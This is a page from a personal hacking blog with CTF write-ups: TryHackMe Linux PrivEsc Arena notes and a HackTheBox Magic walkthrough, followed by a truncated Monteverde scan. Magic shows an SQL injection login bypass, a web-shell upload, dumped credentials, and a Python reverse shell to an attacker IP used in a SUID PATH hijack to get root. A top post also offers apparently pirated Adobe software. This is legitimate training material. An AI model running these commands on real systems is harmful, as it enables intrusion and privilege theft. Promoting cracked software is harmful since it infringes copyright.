Information Technology | Softwares - Graphics - Programming - Hacking - Security

World is Open Source. Type cat vmlinuz > /dev/audio to hear the Voice of God !!

Jul 19, 2020

Download Full Adobe Creative Cloud Suite 2020 Full New Update | Free Download




[Screenshots: application icon, file icon, folder icon, and some splash screens]
Download Adobe After Effects 2020
Download Adobe Animate 2020
Download Adobe Character Animator 2020
Download Adobe Dimension 2020
Download Adobe Illustrator 2020
Download Adobe InDesign 2020
Download Adobe Photoshop Lightroom Classic 2020
Download Adobe Media Encoder 2020
Download Adobe Photoshop 2020
Download Adobe Premiere Pro 2020
Download Adobe XD 2020

Just install and enjoy!




Jun 29, 2020

TryHackMe - Linux PrivEsc Arena


Room link: https://tryhackme.com/room/linuxprivescarena
This room is a very basic introduction to privilege escalation on Linux. Almost every task shows one way to get a root shell, with a very detailed tutorial. I have noted the tasks that needed some work to complete the room; maybe it is helpful.

Task 2
Log in as TCM over SSH: ssh TCM@<machine ip>
Password: Hacker123

Task 4

Read the credentials file: cat /etc/openvpn/auth.txt
It contains the username user and the password password321.

Task 5
#1: TCM trying to log into mysql
#2: TCM trying to log in as root
#3: Password: password123

Task 6
Run "ls -al /etc/" and note the permissions of the shadow file: -rw-rw-r--. The trailing r means /etc/shadow is readable by every user on the box (the normal setting is -rw-r----- root:shadow), so the password hashes can simply be read and cracked offline.

Task 7
Run "find / -name id_rsa 2> /dev/null" to get the path of the id_rsa file: /backups/supersecretkeys/id_rsa
Read it and save it on the attack machine as id_rsa, run "chmod 400 id_rsa" so that ssh accepts the key's permissions, and we can log in as root over SSH without a password: ssh -i id_rsa root@<machine ip>

Task 12
Run "dpkg -l | grep nginx"
We see that the nginx version is 1.6.2-5. This version has a vulnerability that allows local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
#1 Answer: CVE-2016-1247
We can see the PoC in /home/user/tools/nginx/nginxed-root.sh, or the exploit code at this link:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

#2: The script sets SUIDBIN="/usr/bin/sudo", so sudo is the SUID binary that assists in the attack.
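As an added example (not part of the room or of these notes), the three checks from Tasks 6, 7 and the SUID hunt rolled into one small Python enumerator: a world-readable shadow file, private keys the current user can read, and SUID binaries. The tree it scans is constructed in a temporary directory with placeholder contents, so the paths and files are made up and nothing on the real system is touched.

```python
import os
import shutil
import stat
import tempfile


def describe_mode(mode):
    """Render st_mode the way ls -l does, e.g. 0o100664 -> '-rw-rw-r--'."""
    return stat.filemode(mode)


def is_world_readable(mode):
    """The last 'r' in -rw-rw-r--: any user on the box can read the file."""
    return bool(mode & stat.S_IROTH)


def is_suid(mode):
    """The 's' in -rwsr-xr-x: the file runs with its owner's privileges."""
    return bool(mode & stat.S_ISUID)


def enumerate_tree(root):
    """Apply the three checks to every regular file under root. Returns a dict with:
    shadow_world_readable (Task 6), suid (find / -perm -4000) and readable_keys
    (find / -name id_rsa, keeping only keys the current user can actually read)."""
    findings = {"shadow_world_readable": False, "suid": [], "readable_keys": []}
    shadow = os.path.join(root, "etc", "shadow")
    if os.path.isfile(shadow):
        findings["shadow_world_readable"] = is_world_readable(os.stat(shadow).st_mode)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries: the "2>/dev/null" of the find commands
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            rel = os.path.relpath(path, root)
            if is_suid(st.st_mode):
                findings["suid"].append(rel)
            if name == "id_rsa" and os.access(path, os.R_OK):
                findings["readable_keys"].append(rel)
    findings["suid"].sort()
    findings["readable_keys"].sort()
    return findings


def build_sample_tree():
    """Constructed mini filesystem mirroring the room: /etc/shadow left -rw-rw-r--,
    a backup id_rsa readable by everyone and a SUID stub standing in for sudo.
    File contents are placeholders, not real secrets."""
    root = tempfile.mkdtemp(prefix="privesc-")

    def put(rel, mode, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)  # chmod after the write: a write would clear a SUID bit

    put("etc/shadow", 0o664, "root:!:18000:0:99999:7:::\nuser:!:18000:0:99999:7:::\n")
    put("backups/supersecretkeys/id_rsa", 0o644,
        "-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed placeholder)\n")
    put("usr/bin/sudo", 0o4755, "#!/bin/sh\n")
    put("usr/bin/nginx", 0o755, "#!/bin/sh\n")
    return root


def cleanup(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for key, value in enumerate_tree(root).items():
            print(key, value)
        shadow_mode = os.stat(os.path.join(root, "etc", "shadow")).st_mode
        print("shadow mode:", describe_mode(shadow_mode))
    finally:
        cleanup(root)
```

Point it at "/" instead of the sample tree to get the same three answers on a real box; the OSError branch is what keeps it quiet on directories you are not allowed to enter.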


Wonderful knowledge for beginners, thanks to TCM

May 1, 2020

HackTheBox Machine Write-up | Magic Walkthrough

For write-ups of active machines, you need the root flag as the password to read them.
Starting from the Traceback machine, the flag is dynamic, so the write-up will be published when the machine is retired.

┌─[laladee@parrot]─[~]
└──╼ $nmap -A  10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 14:30 BST
Nmap scan report for 10.10.10.185
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.91 seconds

Open the web host and try to log in with SQL injection:
    http://10.10.10.185/login.php
    username: admin
    password: 'or'x'='x
The login succeeds, and then we can upload an image file.
After a few minutes I uploaded a shell successfully (the uploaded file is often deleted, so it has to be used quickly).
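Why the password 'or'x'='x opens the admin account, as an added example that is not the box's code: login.php is not shown on the page, so the string-built query below is an assumption about how it checks credentials. The table is an in-memory SQLite copy of the `login` table from the dump further down, with the one row it contains.

```python
import sqlite3

ADMIN_PASSWORD = "Th3s3usW4sK1ng"  # the one row in the dumped login table
BYPASS = "'or'x'='x"               # the password submitted to login.php


def make_db():
    """In-memory copy of the `login` table with the one row from the dump."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, "
                "username TEXT NOT NULL UNIQUE, password TEXT NOT NULL)")
    con.execute("INSERT INTO login VALUES (1, 'admin', ?)", (ADMIN_PASSWORD,))
    return con


def build_query_unsafe(username, password):
    """Assumed shape of the vulnerable check: string interpolation, so the quotes
    in the attacker's input become SQL syntax instead of data."""
    return ("SELECT id FROM login WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(con, username, password):
    """With BYPASS the WHERE clause becomes
    username='admin' AND password='' or 'x'='x', which is true for every row."""
    return con.execute(build_query_unsafe(username, password)).fetchone() is not None


def login_parameterized(con, username, password):
    """The fix: bound parameters. The input is compared as a value and never
    parsed, so the quotes in BYPASS are just characters of a wrong password."""
    row = con.execute("SELECT id FROM login WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    print(build_query_unsafe("admin", BYPASS))
    print("vulnerable   :", login_vulnerable(con, "admin", BYPASS))
    print("parameterized:", login_parameterized(con, "admin", BYPASS))
```

Two things worth noticing: the username does not matter for the vulnerable query (any name plus the bypass logs in, because the OR swallows the whole condition), and the dump stores the admin password in clear text, so even with parameterised queries the credential should be stored as a salted password hash rather than compared directly.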

passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false

Looking around, I found credentials for the user "theseus" in ../../db.php5:
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

I tried this password for theseus locally and over SSH, but both failed. After trying some things and getting some hints...
The passwd file shows that the machine runs a MySQL service, so I checked the database and dumped it:

www-data@ubuntu:mysqldump -utheseus -piamkingtheseus Magic
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-29  8:52:28

So I got a new credential: 'admin','Th3s3usW4sK1ng'
Switching user to admin shows nothing (there is no local user named admin in the passwd file), but after trying around I could access the user "theseus" with admin's password:

www-data@ubuntu: cd /
www-data@ubuntu:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")' 
www-data@ubuntu:/$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$ ls 
ls
Desktop    Downloads  Pictures Templates  Videos
Documents  Music      Public user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
d7f59901cf48e90bc3d4ead758b82f48


Getting root
theseus@ubuntu:~$ find / -perm -4000 -ls 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
  1052353    376 -rwsr-xr--   1 root     dip        382696 Feb 11 07:05 /usr/sbin/pppd
   924805     40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /usr/bin/newgrp
   924863     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
   924178     76 -rwsr-xr-x   1 root     root        76496 Mar 22  2019 /usr/bin/chfn
   924437     76 -rwsr-xr-x   1 root     root        75824 Mar 22  2019 /usr/bin/gpasswd
   923568    148 -rwsr-xr-x   1 root     root       149080 Jan 31 09:18 /usr/bin/sudo
   924969     24 -rwsr-xr-x   1 root     root        22520 Mar 27  2019 /usr/bin/pkexec
   924180     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /usr/bin/chsh
   925362     20 -rwsr-xr-x   1 root     root        18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   924102     24 -rwsr-xr-x   1 root     root        22528 Jun 28  2019 /usr/bin/arping
   917602     12 -rwsr-xr-x   1 root     root        10312 Dec  9 02:03 /usr/bin/vmware-user-suid-wrapper
  1185246    428 -rwsr-xr-x   1 root     root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
  1180509     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1185286     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
  1180812     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
  1195335     12 -rwsr-sr-x   1 root     root          10232 Dec 18 00:15 /usr/lib/xorg/Xorg.wrap
  1189577    108 -rwsr-sr-x   1 root     root         109432 Oct 30  2019 /usr/lib/snapd/snap-confine
       55     43 -rwsr-xr-x   1 root     root          43088 Aug 22  2019 /snap/core18/1223/bin/mount
       64     63 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /snap/core18/1223/bin/ping
       80     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /snap/core18/1223/bin/su
       98     27 -rwsr-xr-x   1 root     root          26696 Aug 22  2019 /snap/core18/1223/bin/umount
     1730     75 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /snap/core18/1223/usr/bin/chfn
     1732     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /snap/core18/1223/usr/bin/chsh
     1782     75 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /snap/core18/1223/usr/bin/gpasswd
     1846     40 -rwsr-xr-x   1 root     root          40344 Mar 22  2019 /snap/core18/1223/usr/bin/newgrp
     1858     59 -rwsr-xr-x   1 root     root          59640 Mar 22  2019 /snap/core18/1223/usr/bin/passwd
     1949    146 -rwsr-xr-x   1 root     root         149080 Jan 17  2018 /snap/core18/1223/usr/bin/sudo
     2036     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2344    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1223/usr/lib/openssh/ssh-keysign
       55     43 -rwsr-xr-x   1 root     root               43088 Aug 22  2019 /snap/core18/1668/bin/mount
       64     63 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /snap/core18/1668/bin/ping
       80     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /snap/core18/1668/bin/su
       98     27 -rwsr-xr-x   1 root     root               26696 Aug 22  2019 /snap/core18/1668/bin/umount
     1730     75 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /snap/core18/1668/usr/bin/chfn
     1732     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /snap/core18/1668/usr/bin/chsh
     1782     75 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /snap/core18/1668/usr/bin/gpasswd
     1846     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /snap/core18/1668/usr/bin/newgrp
     1858     59 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /snap/core18/1668/usr/bin/passwd
     1949    146 -rwsr-xr-x   1 root     root              149080 Oct 10  2019 /snap/core18/1668/usr/bin/sudo
     2036     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     2344    427 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /snap/core18/1668/usr/lib/openssh/ssh-keysign
       66     40 -rwsr-xr-x   1 root     root               40152 Jan 27 06:28 /snap/core/8689/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/8689/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/8689/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/8689/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Jan 27 06:28 /snap/core/8689/bin/umount
     2666     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/8689/usr/bin/chfn
     2668     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/8689/usr/bin/chsh
     2744     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/8689/usr/bin/gpasswd
     2836     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/8689/usr/bin/newgrp
     2849     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/8689/usr/bin/passwd
     2959    134 -rwsr-xr-x   1 root     root              136808 Jan 31 10:37 /snap/core/8689/usr/bin/sudo
     3058     42 -rwsr-xr--   1 root     systemd-resolve    42992 Nov 29 04:40 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3428    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/8689/usr/lib/openssh/ssh-keysign
     6466    105 -rwsr-sr-x   1 root     root              106696 Feb 12 08:34 /snap/core/8689/usr/lib/snapd/snap-confine
     7640    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/8689/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Aug 23  2019 /snap/core/7917/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/7917/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/7917/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/7917/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Aug 23  2019 /snap/core/7917/bin/umount
     2657     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/7917/usr/bin/chfn
     2659     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/7917/usr/bin/chsh
     2735     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/7917/usr/bin/gpasswd
     2827     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/7917/usr/bin/newgrp
     2840     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
     2950    134 -rwsr-xr-x   1 root     root              136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
     3049     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3419    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
     6454    105 -rwsr-sr-x   1 root     root              106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
     7628    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
   131127     28 -rwsr-xr-x   1 root     root               26696 Jan  8 10:31 /bin/umount
   131130     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   393232     24 -rwsr-x---   1 root     users              22040 Oct 21  2019 /bin/sysinfo
   131123     44 -rwsr-xr-x   1 root     root               43088 Jan  8 10:31 /bin/mount
   131231     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
   131203     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping

I noticed /bin/sysinfo: it is SUID root (-rwsr-x---, owner root, group users), so members of the users group run it with root privileges.
After some hints, I got this: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
Reading /bin/sysinfo, I can see that sysinfo runs the command "fdisk -l" by its bare name, which is resolved through the caller's PATH. That is our target.

The machine has python3, so I made a reverse shell named "fdisk" on my attack machine:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.81",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Serve it from the attack machine:
┌─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...
10.10.10.185 - - [30/Apr/2020 16:37:48] "GET /fdisk HTTP/1.1" 200 -

theseus@ubuntu:/tmp$ wget http://10.10.14.81:1337/fdisk
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/sbin/fdisk
theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/sbin/fdisk
theseus@ubuntu:/tmp$ chmod 755 fdisk
chmod 755 fdisk
theseus@ubuntu:/tmp$ which fdisk
which fdisk
/tmp/fdisk

Listen for the callback:
┌─[✗]─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...

theseus@ubuntu:/tmp$ sysinfo
Then we get root:

┌─[✗]─[laladee@parrot]─[~/Downloads/RevShell]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.81] from (UNKNOWN) [10.10.10.185] 45426
root@ubuntu:/tmp# id   
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@ubuntu:/tmp# cd 
cd 
root@ubuntu:~# cd /root
cd /root
root@ubuntu:/root# cat root.txt
cat root.txt
b3fc3d1750e33cfe35a3ad9c37273956
root@ubuntu:/root# exit
exit
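The sysinfo hijack above, reduced to a runnable added example that is not the machine's code: a temporary directory stands in for /sbin and /tmp, and both fdisk files are constructed stubs that just print a marker. `sysinfo_vulnerable` mimics a SUID helper doing system("fdisk -l"), `resolve_in_path` shows why "which fdisk" only switched to /tmp/fdisk after the chmod 755 (a non-executable file is skipped during the PATH search), and `sysinfo_hardened` is the fix: call the binary by absolute path and give the child a fixed PATH so nothing the caller exported is consulted.

```python
import os
import shutil
import subprocess
import tempfile

# Marker strings printed by the two constructed stubs.
TRUSTED_OUTPUT = "Disk /dev/sda: 20 GiB (trusted fdisk stub)"
HIJACK_OUTPUT = "HIJACKED: fdisk resolved to the planted file"


def plant_fdisk(directory, message, executable):
    """Write a tiny sh script called fdisk into directory (touch + chmod 755 in
    the write-up) and return its path."""
    path = os.path.join(directory, "fdisk")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\nprintf '%s\\n' '" + message + "'\n")
    os.chmod(path, 0o755 if executable else 0o644)
    return path


def build_env():
    """Constructed tree: <root>/sbin holds the 'real' fdisk, <root>/tmp is the
    directory the unprivileged user can write to. Returns (root, trusted, writable)."""
    root = tempfile.mkdtemp(prefix="pathhijack-")
    trusted, writable = os.path.join(root, "sbin"), os.path.join(root, "tmp")
    os.mkdir(trusted)
    os.mkdir(writable)
    plant_fdisk(trusted, TRUSTED_OUTPUT, executable=True)
    return root, trusted, writable


def resolve_in_path(name, path_env):
    """What /bin/sh and `which` do: the first PATH entry holding an executable
    regular file of that name wins; a file without the x bit is skipped."""
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def sysinfo_vulnerable(path_env):
    """Stand-in for a SUID helper calling system("fdisk -l"): the shell it spawns
    resolves the bare name through the PATH the unprivileged caller controls."""
    proc = subprocess.run("fdisk -l", shell=True, env={"PATH": path_env},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def sysinfo_hardened(trusted_dir):
    """Fix: absolute path to the binary plus a fixed PATH for the child, so the
    caller's environment never decides which fdisk runs."""
    proc = subprocess.run([os.path.join(trusted_dir, "fdisk"), "-l"],
                          env={"PATH": trusted_dir}, capture_output=True, text=True)
    return proc.stdout.strip()


def cleanup(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root, trusted, writable = build_env()
    try:
        attacker_path = writable + ":" + trusted              # export PATH=/tmp:$PATH
        plant_fdisk(writable, HIJACK_OUTPUT, executable=False)  # touch fdisk
        print("after touch  :", resolve_in_path("fdisk", attacker_path))
        plant_fdisk(writable, HIJACK_OUTPUT, executable=True)   # chmod 755 fdisk
        print("after chmod  :", resolve_in_path("fdisk", attacker_path))
        print("vulnerable   :", sysinfo_vulnerable(attacker_path))
        print("hardened     :", sysinfo_hardened(trusted))
    finally:
        cleanup(root)
```

The same fix applies to any SUID program or root cron job: never rely on an inherited PATH, and never invoke helpers by bare name from privileged code.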


Apr 20, 2020

HackTheBox Machine Write-up | Monteverde Walkthrough

┌─[laladee@parrot]─[~/Downloads]
└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
